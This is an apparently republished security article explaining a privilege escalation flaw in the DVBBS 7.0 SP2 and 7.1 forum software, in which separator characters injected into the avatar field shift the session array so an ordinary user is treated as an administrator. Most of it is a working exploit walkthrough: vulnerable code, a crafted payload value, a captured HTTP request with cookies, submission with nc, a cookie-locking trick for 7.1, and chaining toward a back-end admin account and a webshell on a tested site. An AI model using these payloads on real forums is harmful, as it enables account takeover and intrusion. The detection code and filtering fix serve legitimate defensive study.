SoFunction
Updated on 2025-04-13

How the Dynamic Network (DVBBS) Front-End Privilege Escalation Vulnerability Works

In June I read an article in Black Defense, "The 7.1 vulnerability in Dynamic Network", describing a vulnerability in the admin_postings.asp file; exploiting it, however, requires super-moderator or front-end administrator rights. That reminded me of a front-end privilege escalation vulnerability I had found earlier in Dongwang (Dynamic Network), and the two can be chained together. This front-end privilege escalation works against both the Access and SQL versions. Below, the 7.0 SP2 SQL version is used to explain its exploitation.
Vulnerability Analysis:
Dongwang determines the group the current user belongs to through GroupID, and then derives the user's permissions from that group's record. Where does GroupID come from? Look at the login-verification code, around line 525:
Rem ========== Forum login function ==========
Rem Check whether the user login is valid
' Note: object and member names dropped by extraction (rsUser.EOF/BOF, rsUser.GetString,
' rsUser.Close, Execute, CacheName, BoardID, UserID) are restored from the standard ADO
' idiom and from the TrueCheckUserLogin code quoted further down; treat them as reconstructed.
Function ChkUserLogin(username,password,mobile,userCookies,ctype)
    ………The previous code is omitted
    SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday "
    SQL=SQL+" From [Dv_User] Where "&SQLstr&""
    Set rsUser=Execute(SQL)
    If rsUser.EOF And rsUser.BOF Then
        ChkUserLogin=false
        Exit Function
    Else
        ' GetString joins every column of the row into one string, with "|||" between fields
        iMyUserInfo=rsUser.GetString(,1, "|||", "", "")
        rsUser.Close:Set rsUser = Nothing
    End If
    iMyUserInfo = "DVBBS|||"& Now & "|||" & Now &"|||"& BoardID &"|||"& iMyUserInfo &"||||||DVBBS"
    ' Split turns the string back into a purely positional array
    iMyUserInfo = Split(iMyUserInfo,"|||")
    If trim(password)<>trim(iMyUserInfo(6)) Then    ' element 6 is UserPassword
        ChkUserLogin=false
    ElseIf iMyUserInfo(17)=1 Then                   ' element 17 is Lockuser
        ChkUserLogin=false
    ElseIf iMyUserInfo(19)=5 Then                   ' element 19 is UserGroupID
        ChkUserLogin=false
    Else
        ChkUserLogin=True
        Session(CacheName & "UserID") = iMyUserInfo
        UserID = iMyUserInfo(4)
        RegName = iMyUserInfo(5)
        Article = iMyUserInfo(8)
        UserLastLogin = iMyUserInfo(15)
        UserClass = iMyUserInfo(18)
        GroupID = iMyUserInfo(19)
        TitlePic = iMyUserInfo(34)
        If Article<0 Then Article=0
    End If
    ………The following code is omitted
As the code shows, Dongwang first joins the user's record with three vertical bars "|||" into a single string held in iMyUserInfo, then splits iMyUserInfo on "|||" into a string array. Once the password check succeeds, the 20th element of the array, iMyUserInfo(19), is assigned to GroupID. In other words, GroupID is nothing more than whatever happens to sit at index 19 of that array. If iMyUserInfo(19) is 1, Dongwang treats the logged-in user as a front-end administrator.
There is a second identity check in the Dv_ClsMain.asp file in the inc directory, used to re-check the user's permissions after the user updates their information.
Around line 650 of Dv_ClsMain.asp:
Public Sub TrueCheckUserLogin()
    ...The previous omission
    Dim Rs,SQL
    SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday"
    SQL=SQL+" From [Dv_User] Where UserID = " & UserID
    Set Rs = Execute(SQL)
    If Rs.EOF And Rs.BOF Then    ' Rs.EOF/BOF, Rs.GetString and Rs.Close were dropped by extraction and are restored here
        Rs.Close:Set Rs = Nothing
        UserID = 0
        EmptyCookies
        LetGuestSession()
    Else
        MyUserInfo=Rs.GetString(,1, "|||","","")
        Rs.Close:Set Rs = Nothing
        If IsArray(Session(CacheName & "UserID")) Then
            MyUserInfo = "DVBBS|||"& Now & "|||" & Session(CacheName & "UserID")(2) &"|||"& BoardID &"|||"& MyUserInfo &"||||||DVBBS"
        Else
            MyUserInfo = "DVBBS|||"& Now & "|||" & DateAdd("s",-3600,Now()) &"|||"& BoardID &"|||"& MyUserInfo &"||||||DVBBS"
        End If
        Response.Write MyUserInfo    ' this statement's verb was lost in extraction; a debug print is assumed
        MyUserInfo = Split(MyUserInfo,"|||")
        ……
    End If
End Sub
' After a successful login, this routine reads the user array and picks out commonly used fields
Public Sub GetCacheUserInfo()
    MyUserInfo = Session(CacheName & "UserID")
    UserID = Clng(MyUserInfo(4))
    MemberName = MyUserInfo(5)
    Lastlogin = MyUserInfo(15)
    If Not IsDate(LastLogin) Then LastLogin = Now()
    UserGroupID = Cint(MyUserInfo(19))    ' the group is read straight from position 19
    ...The following code is omitted
Both checks work in exactly the same way, so either of them serves our purpose. Look at the SQL statement:
SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday"
SQL=SQL+" From [Dv_User] Where UserID = " & UserID

In that select list UserGroupID is the 16th column. If the value of any earlier column contains "|||", the position of UserGroupID in the MyUserInfo array shifts. The column we choose has to meet a few requirements: it must be a text type, not numeric; it must be long enough to hold the array fragment we construct; and it must come before UserGroupID in the SQL statement above, so that the injected separators can move UserGroupID's position in the original array. See Figure 1.
That leaves only UserEmail and UserFace. Because of the IsValidEmail function we cannot put '|' into the UserEmail field, so UserFace is the only usable one.
When basic profile information is modified, Dongwang filters only a handful of characters used for SQL injection and does not strip '|'. So as long as we construct the right string, we can fool Dongwang into treating us as a member of the administrator group:
face=Dv_FilterJS(replace(face,"'",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
' nothing above removes the "|" character
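To make the positional parsing concrete, here is an added Python model (not DVBBS code) of the GetString/Split round trip, together with an audit helper for existing Dv_User rows and a hardened builder that refuses values containing the separator. The column order is taken from the SELECT above; the sample rows, the group number 8 and the date are constructed.

```python
# Added example, not DVBBS code: models the GetString("|||")/Split round trip
# DVBBS 7 uses for its per-user session string. Column order is the page's SELECT.
COLUMNS = (
    "UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,"
    "UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,"
    "UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,"
    "UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,"
    "TruePassWord,UserToday"
).split(",")
SEP = "|||"
PREFIX = 4                                            # "DVBBS", Now, Now, BoardID
GROUP_INDEX = PREFIX + COLUMNS.index("UserGroupID")   # 4 + 15 = 19, as on the page
ADMIN_GROUP = 1                                       # front-end admin group (page)

def build_cache_string(row, board_id=0, now="2005-6-19 18:05:34"):
    """Vulnerable form: a purely positional join, like
    "DVBBS|||" & Now & "|||" & Now & "|||" & BoardID & "|||" & GetString & "||||||DVBBS"."""
    joined = SEP.join(str(row[c]) for c in COLUMNS)
    return f"DVBBS{SEP}{now}{SEP}{now}{SEP}{board_id}{SEP}{joined}{SEP}{SEP}DVBBS"

def group_id_from(cache_string):
    """Mimics Split(MyUserInfo, "|||") followed by CInt(MyUserInfo(19))."""
    return int(cache_string.split(SEP)[GROUP_INDEX])

def delimiter_tainted_columns(row):
    """Audit helper for existing Dv_User rows: any '|' can become part of a
    '|||', so report every column that contains one."""
    return [c for c in COLUMNS if "|" in str(row[c])]

def build_cache_string_safe(row, **kw):
    """Hardened form: refuse the row instead of serialising it, the server-side
    counterpart of the page's fix (filtering '|' from every user variable)."""
    bad = delimiter_tainted_columns(row)
    if bad:
        raise ValueError("separator character in column(s): " + ", ".join(bad))
    return build_cache_string(row, **kw)

def make_row(user_id, name, group_id, face="images/userface/"):
    """Constructed sample row; columns not needed here stay empty."""
    row = {c: "" for c in COLUMNS}
    row.update(UserID=user_id, UserName=name, UserGroupID=group_id, UserFace=face)
    return row

# Constructed ordinary user (group number 8 is arbitrary) and the same user whose
# avatar path carries eight separators, which pushes the trailing "1" to index 19.
NORMAL = make_row(4, "test", 8)
TAINTED = make_row(4, "test", 8, face="images/userface/" + SEP * 8 + "1")
```

The real DVBBS parse also needs the displaced positions to be type-consistent, as the exploitation section explains; the model only shows the index shift and the refusal.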
Vulnerability exploitation:
How do we construct the UserFace value? At first I assumed that making iMyUserInfo(19) equal to 1 would be enough, but it never worked. There is one more thing to take into account when constructing UserFace: we are changing the layout of the iMyUserInfo array, so the leading part of the new array must match the original array's structure position for position, otherwise a type-conversion error occurs. For example, whatever ends up in the UserBirthday position of the new array must be a date. The simplest approach is to take the second half of a normal iMyUserInfo as our UserFace value and change the UserGroupID position to 1. I modified the file to display the current user's iMyUserInfo at login, as shown in Figure 2.
For example, for admin (it need not be admin; any other user works, as long as the UserGroupID position is changed to 1), the value of iMyUserInfo at login is:
DVBBS|||2005-6-19 18:05:34|||2005-6-19 18:05:34|||0|||1|||admin|||469e80d32c0559f8|||eway@|||4|||1|||0||images/userface/||||32|||||2003-12-30 16:34:00|||2005-6-19 18:04:06|||25|||0||| Administrator|||1||||||120|||115|||28|||0|||||||||||210.41.235.200|||0|||0|||0||||||0||||||||||||9pc722664t5w7IM7|||0|0|0 ||||||DVBBS
From it we take the second half:
images/userface/|||32||||32|||2003-12-30 16:34:00|||2005-6-19 18:04:06|||25|||0||||| Administrator||||1|||||||120|||115|||28|||0|||||||||||||||||||||||DVBBS

as our UserFace value. Note that this value may not exceed 255 characters. The Dongwang form limits what we can submit to 100 characters, so we submit the request with nc instead.
Let's test on the local machine first. Log in to Dongwang as an ordinary user; the user level is still "beginner".
Now go to the page where basic information is modified.
Submit, and capture the request with WSE.
The intercepted request is as follows:
POST /bs/?action=updat&username=4 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/-excel, application/-powerpoint, application/msword, */*
Referer: http://210.41.235.199/bs/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)
Host: 210.41.235.199
Content-Length: 396
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 210%2E41%2E235%2E199%2Fbs%2F=userCookies=0&StatUserID=21048347059&password=fVIy4l887ZvD956c&userhidden=&username=test&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&userid=4; upNum=0; ASPSESSIONIDASCDABTA=IEGHDLKCCHDMOBPFPFFHMNAM

title=&sex=1&face=Images%2Fuserface%&myface=Images%2Fuserface%&width=32&height=32&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&userCookies=0&setuserinfo=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0%C2
Now replace the face value with:
images/userface/|||32|||32|||2003-12-30%2016:34:00|||2005-6-19%2018:04:06|||25|||0|||| Administrator|||1|||||||120|||115|||28||||0|||||||||||||||210.41.235.200||||0||||0||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
9pc722664t5w7IM7|||0|0|0 ||||||DVBBS
Note that the spaces in the middle are replaced with %20. Recalculate Content-Length, submit once with nc, and our userface is replaced. Now log in again.
Haha, have you seen it? We are now administrators. Next, use the vulnerability from "Dynamic Network 7.1 Vulnerabilities Appear in the World" in the sixth issue of Black Defense to add a back-end administrator.
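As an added detection example (not code from the page), the following Python scans captured form bodies for the two conditions this walkthrough relies on: a user-info field carrying '|' (raw or URL-encoded as %7C) and an avatar value longer than the 100-character form limit, which a raw client such as nc ignores. The sample requests are constructed after the capture above, and the registration path /bs/?action=add is a hypothetical placeholder.

```python
# Added example, not DVBBS code: flags form bodies bound for the profile-update
# or registration handlers whose user-info fields carry '|' (raw or as %7C) or
# exceed the 100-character limit the page says the form enforces client-side.
from urllib.parse import parse_qs

WATCHED_FIELDS = ("face", "myface", "title", "username", "Signature", "realname")
MAX_FACE_LEN = 100            # client-side limit from the page; nc ignores it

def scan_form_body(body):
    """Return (field, reason) findings for one x-www-form-urlencoded body."""
    findings = []
    fields = parse_qs(body, keep_blank_values=True)   # also decodes %7C to '|'
    for name in WATCHED_FIELDS:
        for value in fields.get(name, []):
            if "|" in value:
                findings.append((name, "separator"))
            if name in ("face", "myface") and len(value) > MAX_FACE_LEN:
                findings.append((name, "overlong"))
    return findings

def scan_requests(requests):
    """requests: iterable of (path, body); returns [(path, field, reason), ...]."""
    return [(path, field, reason)
            for path, body in requests
            for field, reason in scan_form_body(body)]

# Constructed after the page's capture (avatar value shortened); not real traffic.
SAMPLE_REQUESTS = [
    ("/bs/?action=updat&username=4",
     "title=&sex=1&face=Images%2Fuserface%2F&myface=Images%2Fuserface%2F&width=32&height=32"),
    ("/bs/?action=updat&username=4",
     "title=&sex=1&face=images%2Fuserface%2F%7C%7C%7C32%7C%7C%7C32&myface=x&width=32"),
    ("/bs/?action=add",   # hypothetical registration path; the page names none
     "username=newbie&password=p&face=" + "a%7C" * 60),
]
```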
Dongwang 7.1 exploitation method:
Exploiting this vulnerability on 7.1 differs slightly and is harder than on 7.0 SP2, because 7.1 added filtering of the '|' character in the face variable of the profile-update code.
Near line 270 of the file:
face=Dv_FilterJS(Replace(face,"'",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
face=Replace(face,"|","")    ' new in 7.1
Luckily for us, Dongwang's programmers were careless and forgot about the avatar field at registration, where the face variable is not filtered at all. Near line 285 of the file:
If Request("face")<>"" Then    ' Request(...) restored; the object name was lost in extraction
    face=Request("face")
End If
As before, it is best to capture the request first and then submit it with nc. After registering and logging in, you become a front-end administrator. There is another problem, though: TruePassword. 7.1 hardened its protection against cookie spoofing, so this truepassword changes very frequently. In 7.0 SP2 there is only one statement that updates the current user's truepassword:
7.0 SP2 file:
<%
DVBBS.NewPassword0()
%>
7.1 additionally checks whether the user's cookie was updated. About 30 lines into the file:
' Check whether the cookie write succeeded, and update the data only if it did
' (Request.Cookies, Response.Cookies, Execute and UserID restored; the names were lost in extraction)
If (Trim(Request.Cookies(DVBBS.Forum_sn)("password")))=TruePassWord Then
    Execute("UpDate [Dv_user] Set TruePassWord='"&TruePassWord&"' where UserID="&UserID)
    Response.Cookies(DVBBS.Forum_sn)("password") = TruePassWord
    Dim iUserInfo
    iUserInfo = Session(CacheName & "UserID")
    iUserInfo(35) = TruePassWord    ' element 35 is TruePassWord
    Session(CacheName & "UserID") = iUserInfo
End If
In 7.1 the truepassword in the client's cookie is updated to a new value. But because the server-side truepassword is also read from MyUserInfo, and the truepassword in MyUserInfo never changes, the check falls into an endless loop. Our solution is to lock our cookies with the cookie-locking feature of the Guilin Veterans browser; before that, the truepassword in the cookie must be set to match the truepassword in MyUserInfo, so that repeated requests no longer enter the endless loop.
Since I did not have the SQL version of 7.1 on hand, the above was tested on the Access version of 7.1, where it successfully yields front-end administrator rights.
Postscript:
How to prevent the vulnerability: changing the database structure is a bigger job, so the recommended fix is to filter the "|" character out of the corresponding variables, for example:
face=Dv_FilterJS(Replace(face,"'",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
face=Replace(face,"|","")    ' strip the separator; apply the same filter on the registration path
I would also like to point out that Dongwang trusts the back-end administrator far too much, so many back-end pages have no protection against SQL injection at all, which opens a door to SQL injection for us. A website we once tested was set up very BT (extremely locked down). It ran a DVBBS forum. After we obtained DVBBS back-end administrator rights, we found that the upload directory had no execute permission: the ASP * we uploaded was served back as-is. The directory that did have ASP execute permission was not writable, and there were no other sites on the server to inject. In the end, after injecting through the DVBBS back end, I finally got a small webshell (a "pony"). A thousand-mile dike collapses from an ant hole.
To sum it up in one sentence: this privilege escalation vulnerability requires no deep skill, but its consequences are very serious. Since several of the pages managed by the front end are SQL-injectable, this vulnerability is particularly harmful to the DVBBS SQL version. Please do not use the methods in this article to cause damage; otherwise you bear the consequences yourself.